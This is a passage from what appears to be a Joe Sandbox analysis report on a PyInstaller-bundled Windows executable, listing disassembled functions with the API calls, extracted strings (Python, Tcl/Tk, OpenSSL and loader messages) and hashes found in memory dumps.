Instruction Fuzzy Hash: FAB15F36F08A8581FB509B66E864BE967A0EB85B88F042135DE9C8B7DDCF7CD549C700

Function 00007FF76D5C50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C50C0
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5101
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5126
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C514B
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5173
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C519B
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51C3
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51EB
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5213

Strings

PyImport_AddModule, xrefs: 00007FF76D5C53E9, 00007FF76D5C5405
GetProcAddress, xrefs: 00007FF76D5C50E0
PySys_GetObject, xrefs: 00007FF76D5C5641, 00007FF76D5C565D
PyErr_Clear, xrefs: 00007FF76D5C52D1, 00007FF76D5C52ED
PyMarshal_ReadObjectFromString, xrefs: 00007FF76D5C5489, 00007FF76D5C54A5
PyObject_SetAttrString, xrefs: 00007FF76D5C5579, 00007FF76D5C5595
Py_PreInitialize, xrefs: 00007FF76D5C51B9, 00007FF76D5C51D5
Py_DecRef, xrefs: 00007FF76D5C50B6, 00007FF76D5C50D2
PyConfig_Clear, xrefs: 00007FF76D5C51E1, 00007FF76D5C51FD
PyUnicode_AsUTF8, xrefs: 00007FF76D5C5691, 00007FF76D5C56AD
PyMem_RawFree, xrefs: 00007FF76D5C54B1, 00007FF76D5C54CD
Py_InitializeFromConfig, xrefs: 00007FF76D5C5169, 00007FF76D5C5185
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF76D5C55C9, 00007FF76D5C55E5
PyImport_ImportModule, xrefs: 00007FF76D5C5439, 00007FF76D5C5455
PyObject_Str, xrefs: 00007FF76D5C55A1, 00007FF76D5C55BD
PyUnicode_Decode, xrefs: 00007FF76D5C56B9, 00007FF76D5C56D5
PyConfig_SetString, xrefs: 00007FF76D5C5281, 00007FF76D5C529D
PyEval_EvalCode, xrefs: 00007FF76D5C53C1, 00007FF76D5C53DD
PyErr_NormalizeException, xrefs: 00007FF76D5C5321, 00007FF76D5C533D
PySys_SetObject, xrefs: 00007FF76D5C5669, 00007FF76D5C5685
PyModule_GetDict, xrefs: 00007FF76D5C54D9, 00007FF76D5C54F5
PyUnicode_FromFormat, xrefs: 00007FF76D5C5709, 00007FF76D5C5725
PyObject_CallFunctionObjArgs, xrefs: 00007FF76D5C5529, 00007FF76D5C5545
PyRun_SimpleStringFlags, xrefs: 00007FF76D5C55F1, 00007FF76D5C560D
PyErr_Fetch, xrefs: 00007FF76D5C52F9, 00007FF76D5C5315
PyErr_Print, xrefs: 00007FF76D5C5371, 00007FF76D5C538D
Py_DecodeLocale, xrefs: 00007FF76D5C50F7, 00007FF76D5C5113
PyObject_GetAttrString, xrefs: 00007FF76D5C5551, 00007FF76D5C556D
PyUnicode_DecodeFSDefault, xrefs: 00007FF76D5C56E1, 00007FF76D5C56FD
PyUnicode_Join, xrefs: 00007FF76D5C5759, 00007FF76D5C5775
PyErr_Restore, xrefs: 00007FF76D5C5399, 00007FF76D5C53B5
Failed to get address for %hs, xrefs: 00007FF76D5C50D9
PyList_Append, xrefs: 00007FF76D5C5461, 00007FF76D5C547D
PyConfig_InitIsolatedConfig, xrefs: 00007FF76D5C5209, 00007FF76D5C5225
Py_IsInitialized, xrefs: 00007FF76D5C5191, 00007FF76D5C51AD
PyImport_ExecCodeModule, xrefs: 00007FF76D5C5411, 00007FF76D5C542D
Py_Finalize, xrefs: 00007FF76D5C5141, 00007FF76D5C515D
PyObject_CallFunction, xrefs: 00007FF76D5C5501, 00007FF76D5C551D
PyUnicode_Replace, xrefs: 00007FF76D5C5781, 00007FF76D5C579D
PyConfig_SetWideStringList, xrefs: 00007FF76D5C52A9, 00007FF76D5C52C5
Py_ExitStatusException, xrefs: 00007FF76D5C511C, 00007FF76D5C5138
PyStatus_Exception, xrefs: 00007FF76D5C5619, 00007FF76D5C5635
PyUnicode_FromString, xrefs: 00007FF76D5C5731, 00007FF76D5C574D
PyErr_Occurred, xrefs: 00007FF76D5C5349, 00007FF76D5C5365
PyConfig_Read, xrefs: 00007FF76D5C5231, 00007FF76D5C524D
PyConfig_SetBytesString, xrefs: 00007FF76D5C5259, 00007FF76D5C5275

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: dcd2a43fb98ae11f8d371fea8ef00dc3fa6924d50b2b81194dc738634587f8d1
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 01129168D2EF03D1FA15FB44A8501B4A7A1AF48792FD4143ACC1E12AA6FF7CF5488670

Function 00007FF76D5C6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF76D5C6EB7
GetProcAddress.KERNEL32 ref: 00007FF76D5C6EFD
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F22
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F47
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F6F
GetProcAddress.KERNEL32 ref: 00007FF76D5C6F97
GetProcAddress.KERNEL32 ref: 00007FF76D5C6FBF
GetProcAddress.KERNEL32 ref: 00007FF76D5C6FE7
GetProcAddress.KERNEL32 ref: 00007FF76D5C700F

Strings

Tcl_ConditionWait, xrefs: 00007FF76D5C711D, 00007FF76D5C7139
Tcl_ConditionNotify, xrefs: 00007FF76D5C70F5, 00007FF76D5C7111
Tcl_GetString, xrefs: 00007FF76D5C720D, 00007FF76D5C7229
Tcl_ConditionFinalize, xrefs: 00007FF76D5C70CD, 00007FF76D5C70E9
Tcl_DoOneEvent, xrefs: 00007FF76D5C6F3D, 00007FF76D5C6F59
Tcl_Alloc, xrefs: 00007FF76D5C734D, 00007FF76D5C7369
Tcl_EvalFile, xrefs: 00007FF76D5C72D5, 00007FF76D5C72F1
Tcl_GetCurrentThread, xrefs: 00007FF76D5C7005, 00007FF76D5C7021
GetProcAddress, xrefs: 00007FF76D5C6ED7
Tcl_JoinThread, xrefs: 00007FF76D5C702D, 00007FF76D5C7049
Tcl_CreateThread, xrefs: 00007FF76D5C6FDD, 00007FF76D5C6FF9
Tcl_SetVar2, xrefs: 00007FF76D5C71BD, 00007FF76D5C71D9
Tcl_MutexUnlock, xrefs: 00007FF76D5C707D, 00007FF76D5C7099
Tk_GetNumMainWindows, xrefs: 00007FF76D5C73C5, 00007FF76D5C73E1
Tcl_Free, xrefs: 00007FF76D5C7375, 00007FF76D5C7391
Tcl_Init, xrefs: 00007FF76D5C6EB0, 00007FF76D5C6EC9
Tcl_EvalObjv, xrefs: 00007FF76D5C7325, 00007FF76D5C7341
Tcl_FinalizeThread, xrefs: 00007FF76D5C6F8D, 00007FF76D5C6FA9
Tcl_Finalize, xrefs: 00007FF76D5C6F65, 00007FF76D5C6F81
Tcl_NewStringObj, xrefs: 00007FF76D5C7235, 00007FF76D5C7251
Tcl_NewByteArrayObj, xrefs: 00007FF76D5C725D, 00007FF76D5C7279
Tcl_MutexFinalize, xrefs: 00007FF76D5C70A5, 00007FF76D5C70C1
Tcl_ThreadAlert, xrefs: 00007FF76D5C716D, 00007FF76D5C7189
Tcl_SetVar2Ex, xrefs: 00007FF76D5C7285, 00007FF76D5C72A1
Tcl_GetObjResult, xrefs: 00007FF76D5C72AD, 00007FF76D5C72C9
Tcl_FindExecutable, xrefs: 00007FF76D5C6F18, 00007FF76D5C6F34
Failed to get address for %hs, xrefs: 00007FF76D5C6ED0
Tcl_GetVar2, xrefs: 00007FF76D5C7195, 00007FF76D5C71B1
Tcl_MutexLock, xrefs: 00007FF76D5C7055, 00007FF76D5C7071
Tcl_EvalEx, xrefs: 00007FF76D5C72FD, 00007FF76D5C7319
Tcl_CreateInterp, xrefs: 00007FF76D5C6EF3, 00007FF76D5C6F0F
Tcl_ThreadQueueEvent, xrefs: 00007FF76D5C7145, 00007FF76D5C7161
Tcl_DeleteInterp, xrefs: 00007FF76D5C6FB5, 00007FF76D5C6FD1
Tk_Init, xrefs: 00007FF76D5C739D, 00007FF76D5C73B9
Tcl_CreateObjCommand, xrefs: 00007FF76D5C71E5, 00007FF76D5C7201

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 9f4e4e738d44f46ad2e55ab6ebf46b83c2bc2b25c6657284d3a78060318321bb
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: EFE17768D3DB03D1EA59FB14A9501B4A3A5AF8C792FD4103ACC1D06BA6FF7CB5488670

Function 00007FF76D5C77D0 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF76D5C7C97,?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C782C

Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736

Strings

\, xrefs: 00007FF76D5C7861
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF76D5C789D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF76D5C7803
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF76D5C78D9
%.*s, xrefs: 00007FF76D5C790C
[oV116, xrefs: 00007FF76D5C77DF
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF76D5C796D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF76D5C7840
CreateDirectory, xrefs: 00007FF76D5C7974

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$[oV116$\
API String ID: 1662231829-1446728369
Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
Instruction ID: 9408ae2ab19cebbd0c409b4ff9f69d6af695db70648c0e9d199bf38b6d6a3c21
Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
Instruction Fuzzy Hash: D9419411E3C643C1FB60BB24D8516BAE261AF98784FC4543ADE4E42E97FE6CE1048B70

Function 00007FF76D5C15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF76D5C178C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C168E
fopen, xrefs: 00007FF76D5C161E
fwrite, xrefs: 00007FF76D5C177C
malloc, xrefs: 00007FF76D5C16F6
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF76D5C16EF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C165B
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C1785
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF76D5C1775
Failed to create symbolic link %s!, xrefs: 00007FF76D5C15E2
fseek, xrefs: 00007FF76D5C1695
Failed to extract %s: failed to open target file!, xrefs: 00007FF76D5C1617

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 91216cdd80ef99cbd30311021a24b424b5ca0d451c8436cbdecec9b9f388c83e
Instruction ID: 134f155b7ec8cdd1af335565368b3dc9593892fbddf6f13be953dd8d6c6e7f36
Opcode Fuzzy Hash: 91216cdd80ef99cbd30311021a24b424b5ca0d451c8436cbdecec9b9f388c83e
Instruction Fuzzy Hash: 6C517A61B2C643D2EA10BB25A9505B9A3A0BF48B94FC44139ED1D47F97FE3CE5548B30

Function 00007FFDF716DD20 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 98COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF716DD56
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF716DD87

Strings

SUITEB128C2, xrefs: 00007FFDF716DD7A
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FFDF716DE81
SUITEB128, xrefs: 00007FFDF716DDAB
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF716DE5E
..\s\ssl\ssl_ciph.c, xrefs: 00007FFDF716DE1C
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF716DE65, 00007FFDF716DE75
SUITEB192, xrefs: 00007FFDF716DDD9
SUITEB128ONLY, xrefs: 00007FFDF716DD4A

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
API String ID: 4069847057-2661540032
Opcode ID: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
Instruction ID: 04b3a24a37d321d61dd44cff61dc4200a8b83de3a8240810e6e6fa63f6a8aef1
Opcode Fuzzy Hash: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
Instruction Fuzzy Hash: BF41807BF08A1A96EB188B10D860BF933A0FB58B84F445435DA6D836D8DF2CE568C700

Function 00007FFDF715247D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 141COMMON

Download Yara Rule

APIs

00007FFE13301210.VCRUNTIME140 ref: 00007FFDF71B3869
00007FFE13301210.VCRUNTIME140 ref: 00007FFDF71B3886
00007FFE13301210.VCRUNTIME140 ref: 00007FFDF71B38C5

Strings

server finished, xrefs: 00007FFDF71B387C
..\s\ssl\t1_enc.c, xrefs: 00007FFDF71B37A8, 00007FFDF71B3967, 00007FFDF71B3985
key expa, xrefs: 00007FFDF71B38D2
client finished, xrefs: 00007FFDF71B385F
master s, xrefs: 00007FFDF71B3893
nsio, xrefs: 00007FFDF71B38E1
extended master secret, xrefs: 00007FFDF71B38BB
n, xrefs: 00007FFDF71B38EA

Memory Dump Source

Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true

Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd

Similarity

API ID: 00007E13301210
String ID: ..\s\ssl\t1_enc.c$client finished$extended master secret$key expa$master s$n$nsio$server finished
API String ID: 597871296-2209449699
Opcode ID: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
Instruction ID: 9cff1fb3f28cf8c607123fc15b8aa714c2fcc2252f47b8482538f1ed007ec7b7
Opcode Fuzzy Hash: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
Instruction Fuzzy Hash: FB51A267F08B8181E7608F1AA850BE967A4EB94BC4F45A139DE9C43BD9DF3CD598C700

Function 00007FFDF72132B0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

00007FFE1FFA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDF740C31C
00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF740C331
00007FFE1FFA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDF740C343

Strings

millisecs, xrefs: 00007FFDF740C327
accuracy, xrefs: 00007FFDF740C253, 00007FFDF740C2A3, 00007FFDF740C3F4
microsecs, xrefs: 00007FFDF740C34E
p, xrefs: 00007FFDF740C3D4
..\s\crypto\ts\ts_conf.c, xrefs: 00007FFDF740C290, 00007FFDF740C3DC
secs, xrefs: 00007FFDF740C2ED

Memory Dump Source

Source File: 00000003.00000002.2063693974.00007FFDF7211000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFDF7210000, based on PE: true

Associated: 00000003.00000002.2063642095.00007FFDF7210000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF721D000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7275000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7289000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7299000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF72AD000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF745E000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF748B000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF74BD000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7530000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7536000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7538000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7555000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2063693974.00007FFDF7562000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2065078248.00007FFDF7566000.00000080.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000003.00000002.2065120832.00007FFDF7568000.00000004.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7210000_Built.jbxd

Similarity

API ID: 00007$A1370$B5630
String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
API String ID: 751195488-1596076588
Opcode ID: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
Instruction ID: 848f22f73c0c5ab4b64a225c5f2c4ab4150745dda7252e49757606033aec3a26
Opcode Fuzzy Hash: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
Instruction Fuzzy Hash: 0C518B2AB18647E2EB14DB62E420EF96391BF44B84F440039ED6E43BD9DE7CE4058700

Function 00007FF76D5C20F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF76D5C211B
SelectObject.GDI32 ref: 00007FF76D5C2162
DrawTextW.USER32 ref: 00007FF76D5C2185
SelectObject.GDI32 ref: 00007FF76D5C219B
ReleaseDC.USER32 ref: 00007FF76D5C21AB
MoveWindow.USER32 ref: 00007FF76D5C21FB
MoveWindow.USER32 ref: 00007FF76D5C223B
MoveWindow.USER32 ref: 00007FF76D5C228E
MoveWindow.USER32 ref: 00007FF76D5C22D6

Strings

[oV116, xrefs: 00007FF76D5C20FB
P%, xrefs: 00007FF76D5C216F

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%$[oV116
API String ID: 2147705588-2705092927
Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction ID: 1ced1044051193052f11547bade4a54319b432d052b523778522b2f22fd7e498
Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction Fuzzy Hash: 7C51E7266187A1C6D734AF26A4181BAF7A1F798B62F404135EFDE43A85EF3CD045CB20

Function 00007FFDF7032730 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDF7032758
__scrt_initialize_crt.LIBCMT ref: 00007FFDF703279D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDF70327AA
_RTC_Initialize.LIBCMT ref: 00007FFDF70327D8
